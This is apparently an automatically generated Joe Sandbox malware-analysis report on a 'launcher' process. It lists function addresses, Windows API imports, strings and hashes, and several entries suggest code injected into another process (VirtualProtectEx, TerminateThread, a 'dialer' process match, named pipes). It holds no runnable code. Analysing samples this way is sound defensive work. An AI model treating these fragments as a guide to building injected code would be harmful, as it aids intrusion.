Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?egptr@?$basic_streambuf@?gptr@?$basic_streambuf@
String ID:
API String ID: 288742420-0
Opcode ID: 6e48574e4d682f1e78710d0f827cf0739af9f715d8ec5ab6e03383239cb6399c
Instruction ID: 2159884770b30b5a897313d1fbb13edf4baedee8e0f4d35a16812f593dea703e
Opcode Fuzzy Hash: 6e48574e4d682f1e78710d0f827cf0739af9f715d8ec5ab6e03383239cb6399c
Instruction Fuzzy Hash: 84116023E3DA4681EA55AB16A64413DE3A0EF49FC4F680430DE4E07F55DE2CF4A2C320

Function 000001EDF1671B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001EDF1671BCD
GetLastError.KERNEL32 ref: 000001EDF1671BD9
CloseHandle.KERNEL32 ref: 000001EDF1671BF1
CreateFileW.KERNEL32 ref: 000001EDF1671C1C
WriteConsoleW.KERNEL32 ref: 000001EDF1671C3B

Strings

CONOUT$, xrefs: 000001EDF1671BFD

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: ef39f0bb599b4c1b8d471e7fd0a2e63156e57b0656fb7b5dbb8b80550fc3e04f
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: AD115831214B8086E750CB66F85439DB7E0F78AFE4F144325EE5A877A6DF78C9468740

Function 00007FF77E09B780 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

_Min_value.LIBCPMTD ref: 00007FF77E09B7B8
_Min_value.LIBCPMTD ref: 00007FF77E09B7FA
memset.VCRUNTIME140(?,?,00000000,?,?,?,00007FF77E09855E,?,?,?,?,?,00007FF77E095213), ref: 00007FF77E09B84E
memcpy.VCRUNTIME140(?,?,00000000,?,?,?,00007FF77E09855E,?,?,?,?,?,00007FF77E095213), ref: 00007FF77E09B860
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77E09B8A7

Part of subcall function 00007FF77E081230: __std_exception_copy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF77E09FF7B,?,?,?), ref: 00007FF77E081274

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF77E09855E), ref: 00007FF77E09B922

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: Min_valuememcpy$Concurrency::cancel_current_task__std_exception_copymemset
String ID:
API String ID: 4163603036-0
Opcode ID: 3035bcba09613df351410568340861cae86bfcf14264b61ec107ec6c14f2468d
Instruction ID: cd34fec62e8b8062adb50beadd365415b1fb0231612c72dbac4c871ef646244b
Opcode Fuzzy Hash: 3035bcba09613df351410568340861cae86bfcf14264b61ec107ec6c14f2468d
Instruction Fuzzy Hash: 5441B573725B8486DA10EF65E4400AEA3A4FB44BE0B688635DFAD47795CF3CE162C700

Function 00007FF77E09EAF0 Relevance: 9.1, APIs: 6, Instructions: 125COMMON

Download Yara Rule

APIs

?tolower@?$ctype@D@std@@QEBADD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,00007FF77E09D8E0,?,?,00007FF77E088C2E,00007FF77E09E896), ref: 00007FF77E09EB14
?tolower@?$ctype@D@std@@QEBADD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,00007FF77E09D8E0,?,?,00007FF77E088C2E,00007FF77E09E896), ref: 00007FF77E09EB29
realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF77E09D8E0,?,?,00007FF77E088C2E,00007FF77E09E896), ref: 00007FF77E09EC08
?_Xbad_alloc@std@@YAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,00007FF77E09D8E0,?,?,00007FF77E088C2E,00007FF77E09E896), ref: 00007FF77E09EC13
realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF77E09D8E0,?,?,00007FF77E088C2E,00007FF77E09E896), ref: 00007FF77E09EC4A
?_Xbad_alloc@std@@YAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,00007FF77E09D8E0,?,?,00007FF77E088C2E,00007FF77E09E896), ref: 00007FF77E09EC55

Part of subcall function 00007FF77E09FF40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF77E09F7B7), ref: 00007FF77E09FF5A

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: ?tolower@?$ctype@D@std@@Xbad_alloc@std@@realloc$malloc
String ID:
API String ID: 2093286772-0
Opcode ID: 47d5f694d99e78a50cc1cc6b5d0d3cfc4826163145d440a17462a4a39430fe1e
Instruction ID: 2cc5ba84be07b5794e2230122ba578fdb3d7696f1f9433d5e244e1bbc3f67c75
Opcode Fuzzy Hash: 47d5f694d99e78a50cc1cc6b5d0d3cfc4826163145d440a17462a4a39430fe1e
Instruction Fuzzy Hash: D9518033A29A4186D724AF15E48017DF7E0EB98B94BA48135DB8E43755DF3CF892C720

Function 00007FF77E08ACA0 Relevance: 9.1, APIs: 6, Instructions: 114COMMON

Download Yara Rule

APIs

?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08ACCA
?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08ACE2
?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08ACFD
?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXPEAD00@Z.MSVCP140 ref: 00007FF77E08ADAB
?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08ADBF
fpos.LIBCPMTD ref: 00007FF77E08ADEB

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@?epptr@?$basic_streambuf@?gptr@?$basic_streambuf@?pptr@?$basic_streambuf@?setg@?$basic_streambuf@D00@fpos
String ID:
API String ID: 2566242458-0
Opcode ID: beee09bbc581e6063ba2d334a80ecedf555963e427936305574f9a5810b82fea
Instruction ID: e67aba93a46a55f14d2a14462045b5d8521fa3eed57a3e013d7c99b23bb51f6a
Opcode Fuzzy Hash: beee09bbc581e6063ba2d334a80ecedf555963e427936305574f9a5810b82fea
Instruction Fuzzy Hash: EC419323A39B4242EAE56A16952523AD2A1EF44BD5FA80130DE8F47F91DE3CF461C220

Function 000001EDF16630B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001EDF16630D7
HeapAlloc.KERNEL32 ref: 000001EDF16630EA
StrCmpNIW.SHLWAPI ref: 000001EDF166316B
GetProcessHeap.KERNEL32 ref: 000001EDF16631D1
HeapFree.KERNEL32 ref: 000001EDF16631DF

Strings

dialer, xrefs: 000001EDF1663164

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: ebef9cdb7c3cdeb838e680fa06dd5cfbbdfdfedff857074caf7b17d9ce8203a2
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 4C317E32701B95C2EA15DF26F9442ADB3F0FB56B85F0881209E4A0BB57EF38C4A68700

Function 00007FF77E084630 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF77E084656
??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF77E084670

Part of subcall function 00007FF77E081400: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,00007FF77E08468D), ref: 00007FF77E081436

?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF77E0846C2
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77E0846CE
??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF77E0847A1

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskGetcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@V42@@Vfacet@locale@2@
String ID:
API String ID: 995143843-0
Opcode ID: 7aed14ece1d310df2e91aa329b2b50b7f0f69498ea0d94dc4c06b426ed8b4773
Instruction ID: 443330a5ec05ff21eef5ad2bbeaa21456bf9e457fc3822faa925d65f678f1557
Opcode Fuzzy Hash: 7aed14ece1d310df2e91aa329b2b50b7f0f69498ea0d94dc4c06b426ed8b4773
Instruction Fuzzy Hash: 2541B637629F8585DA609B15F49036AF7A4F788BA4FA04132EACD43B68DF3CE054CB10

Function 00007FF77E08AEF0 Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08AF10
?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08AF25
char_traits.LIBCPMTD ref: 00007FF77E08AF43
?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXH@Z.MSVCP140 ref: 00007FF77E08AF69
char_traits.LIBCPMTD ref: 00007FF77E08AF82
?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ.MSVCP140 ref: 00007FF77E08AF9B

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@char_traits$?eback@?$basic_streambuf@?gbump@?$basic_streambuf@
String ID:
API String ID: 886876170-0
Opcode ID: df3715f31f29913e85369fa2bfb76efc1211ac19dbdbe052de65e07257d1c6d9
Instruction ID: 54a1bc005586e4d2a16cc6476c593fe999bd981c06c70e1d5ce181a72b49e11c
Opcode Fuzzy Hash: df3715f31f29913e85369fa2bfb76efc1211ac19dbdbe052de65e07257d1c6d9
Instruction Fuzzy Hash: 8221716393C64241EA60BB24E5511BDE7A0EF98794FE40231E98D07A97DF2CF955C730

Function 000001EDF1661A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001EDF1661A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000001EDF1661A58
PathFindFileNameW.SHLWAPI ref: 000001EDF1661A67
lstrlenW.KERNEL32 ref: 000001EDF1661A73
StrCpyW.SHLWAPI ref: 000001EDF1661A86
CloseHandle.KERNEL32 ref: 000001EDF1661A94

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 46bf96e2bb8d370449bbc9d06960a19ecb5dc3a411f60266a350773ae4e35c7d
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 41018C31310A8196EB10DB22F8587AD63E1F789FC1F488535CE8A47B66DE3DC98AC300

Function 000001EDF16637AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000001EDF16637C8
GetCurrentProcess.KERNEL32 ref: 000001EDF16637D6
VirtualProtectEx.KERNEL32 ref: 000001EDF16637F8
GetCurrentProcess.KERNEL32 ref: 000001EDF1663819
VirtualProtectEx.KERNEL32 ref: 000001EDF166383A
TerminateThread.KERNEL32 ref: 000001EDF1663849

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: b45ea859bc37799bba96f7124697dca043b0328623d014c76b3c4b630cfb2804
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: C5110575611B8082FB25DB31F80979E67E0BB5AB85F040628DE5A0B7A7EF3CC41AC700

Function 000001EDF16690D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001EDF1669103
_IsNonwritableInCurrentImage.LIBCMT ref: 000001EDF1669198
RtlUnwindEx.NTDLL ref: 000001EDF16691E7

Strings

csm, xrefs: 000001EDF166917E
f, xrefs: 000001EDF1669116

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: b18cc861fc1cf74bc8ebb23cf6b74548d98d24a13e255f1d1407d8652f739d07
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 665179322216808BEB14DF35F468B9D77E9F386B98F608124AE574B78BDB35D942C700

Function 00007FF77E087780 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00007FF77E0878B8
char_traits.LIBCPMTD ref: 00007FF77E0878F4

Strings

at line , xrefs: 00007FF77E0878B1, 00007FF77E0878C0
, column , xrefs: 00007FF77E0878ED, 00007FF77E0878FC
>, xrefs: 00007FF77E087882

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: char_traits
String ID: at line $, column $>
API String ID: 1158913984-1466611262
Opcode ID: 05aadea33c3ccf62ad29d538a16b9f9fb1f7ce2dddc1bfeec24b002aebaf32a5
Instruction ID: 4562d14cb7ea784d82f26e30dc8a22cf03cbc5c2519e2074581233a10fa7c338
Opcode Fuzzy Hash: 05aadea33c3ccf62ad29d538a16b9f9fb1f7ce2dddc1bfeec24b002aebaf32a5
Instruction Fuzzy Hash: 4541C063638A8191EA10EF25E0513EEA7A5FB95BC0FD44132DA8D43B5ADF3CE505C720

Function 00007FF77E097D70 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00007FF77E097DB1
char_traits.LIBCPMTD ref: 00007FF77E097DE2

Part of subcall function 00007FF77E087540: char_traits.LIBCPMTD ref: 00007FF77E087635
Part of subcall function 00007FF77E087540: char_traits.LIBCPMTD ref: 00007FF77E087694

__std_exception_copy.VCRUNTIME140 ref: 00007FF77E097E97

Strings

general, xrefs: 00007FF77E097D70
type_error, xrefs: 00007FF77E097DDB, 00007FF77E097DEA

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: char_traits$__std_exception_copy
String ID: general$type_error
API String ID: 926054189-4260220064
Opcode ID: 31cab48c25daa35ff849433e911953139feb11195ed7e43529a78858812c0b74
Instruction ID: d124ac5f2ad6f99d36fd7217b5b5d48133039c0c517e4c252acc78ffa9ce21e9
Opcode Fuzzy Hash: 31cab48c25daa35ff849433e911953139feb11195ed7e43529a78858812c0b74
Instruction Fuzzy Hash: B8313223A38B4695D620FB50F4502EAB760FBD5344FE05132D6CD42A65EF2CF685C760

Function 000001EDF1661AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001EDF1661AD8
StrCmpNIW.SHLWAPI ref: 000001EDF1661AF2
lstrlenW.KERNEL32 ref: 000001EDF1661B01
StrCpyW.SHLWAPI ref: 000001EDF1661B16

Strings

\\?\, xrefs: 000001EDF1661AE6

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 2786ab8557e3d00dae9ff5cfb6a39b035179701f8eb4dce7c10079c2a6e5b3bb
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 00F044323146C192E760CB31F49439D67B1F785B98F888120CE4A4A957EF2DC68ACB00

Function 000001EDF1663200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000001EDF1663222
StrCpyW.SHLWAPI ref: 000001EDF1663232
StrCatW.SHLWAPI ref: 000001EDF166323E
PathCombineW.SHLWAPI ref: 000001EDF166324C

Strings

\\.\pipe\, xrefs: 000001EDF1663218

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 24d2449195923634bfda18b884fefbe027a4d4928e205611fa85e7cd01fe758d
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: A1F05E30204BC091EA10CB23F90419D62A5AB4AFD0F0882319E5B07B2BCE28C442C700

Function 000001EDF166A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001EDF166A154
GetProcAddress.KERNEL32 ref: 000001EDF166A16A
FreeLibrary.KERNEL32 ref: 000001EDF166A187

Strings

mscoree.dll, xrefs: 000001EDF166A14B
CorExitProcess, xrefs: 000001EDF166A163

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: ba6351739f0f571fa874038e7e5533994aa468271b3bca91445cc578aee6165e
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: ECF0F871321AC4D1FB59CB70F8843ED63E0AB89BD1F4421199D1B4A667DE28C48AC700

Function 000001EDF1670860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001EDF16708A2
GetConsoleMode.KERNEL32 ref: 000001EDF1670960
GetLastError.KERNEL32 ref: 000001EDF16709EA

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: c61dde64ff6ddff2eff27a1b6682f4ff776b2b1f0aa8794cbc39d79ae2f3996b
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: B781563262069489EB50EB75F8503ED27E0A74BB98F554316EE0BA7693DE3AC4478320

Function 000001EDF16657F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001EDF1665806

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 391bdceae7d8abe40659ce668f338d58b4ab221fc177ec12fd98c8e388539aa3
Instruction ID: 379efd32bf40d78ca45248a18630c8cc12d065de6ce0ceeaf8e12fc3d812eeda
Opcode Fuzzy Hash: 391bdceae7d8abe40659ce668f338d58b4ab221fc177ec12fd98c8e388539aa3
Instruction Fuzzy Hash: 70619536519B84C6E760DB25F45535EB7E0F38A794F100219EE8E8BBAADB78C5428F00

Function 00007FF77E086420 Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,00007FF77E0861CA), ref: 00007FF77E086481
_Max_value.LIBCPMTD ref: 00007FF77E0864B3
_Min_value.LIBCPMTD ref: 00007FF77E0864D2

Part of subcall function 00007FF77E094970: _Max_value.LIBCPMTD ref: 00007FF77E0949B6
Part of subcall function 00007FF77E094970: _Min_value.LIBCPMTD ref: 00007FF77E0949D5
Part of subcall function 00007FF77E094970: _Max_value.LIBCPMTD ref: 00007FF77E094A13

memcpy.VCRUNTIME140 ref: 00007FF77E08651A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77E086562

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: Max_value$Min_valuememcpy$Concurrency::cancel_current_task
String ID:
API String ID: 2541795887-0
Opcode ID: 8864e3b53888bbd4b276f160c89776f3679683a31fcdc45f27940b5258e9d787
Instruction ID: ce2263d32de8f6fcb295c85b5edd0e5e1c732554bd795448f04a2ea1a143539d
Opcode Fuzzy Hash: 8864e3b53888bbd4b276f160c89776f3679683a31fcdc45f27940b5258e9d787
Instruction Fuzzy Hash: BF41C133638A4185EA14EF21F4442A9B3A1FB84FD4FA84532DA5D4B796DF3CE091C320

Function 00007FF77E095CB0 Relevance: 7.6, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_Min_value.LIBCPMTD ref: 00007FF77E095CFA
_Min_value.LIBCPMTD ref: 00007FF77E095D33
memcpy.VCRUNTIME140(?,?,00000000,00000000,00000000,00007FF77E08FBC0,?,?,?,00007FF77E08E6E0), ref: 00007FF77E095D91
memcpy.VCRUNTIME140(?,?,00000000,00000000,00000000,00007FF77E08FBC0,?,?,?,00007FF77E08E6E0), ref: 00007FF77E095DA4
allocator.LIBCONCRTD ref: 00007FF77E095DBB

Memory Dump Source

